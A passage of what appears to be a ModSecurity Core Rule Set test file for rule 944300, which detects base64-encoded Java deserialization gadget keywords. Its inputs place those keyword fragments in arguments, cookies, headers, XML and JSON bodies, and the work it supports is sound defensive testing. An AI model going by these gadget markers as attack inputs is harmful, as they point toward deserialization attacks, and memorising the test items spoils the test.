"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: aW5zdGFudGlhdGVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-137 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-138 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-139 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-140 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-141 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" output: log_contains: "id \"944300\"" - test_title: 944300-142 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-143 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-144 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-145 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-146 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-147 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Gluc3RhbnRpYXRlZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-148 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-149 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-150 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-151 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-152 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-153 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-154 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-155 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" output: log_contains: "id \"944300\"" - test_title: 944300-156 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-157 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-158 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BpbnN0YW50aWF0ZWZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-159 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-160 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-161 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-162 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-163 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" output: log_contains: "id \"944300\"" - test_title: 944300-164 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-165 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-166 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-167 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-168 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-169 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-170 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-171 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-172 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-173 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-174 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-175 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-176 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-177 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-178 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-179 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-180 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-181 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - stage: input: 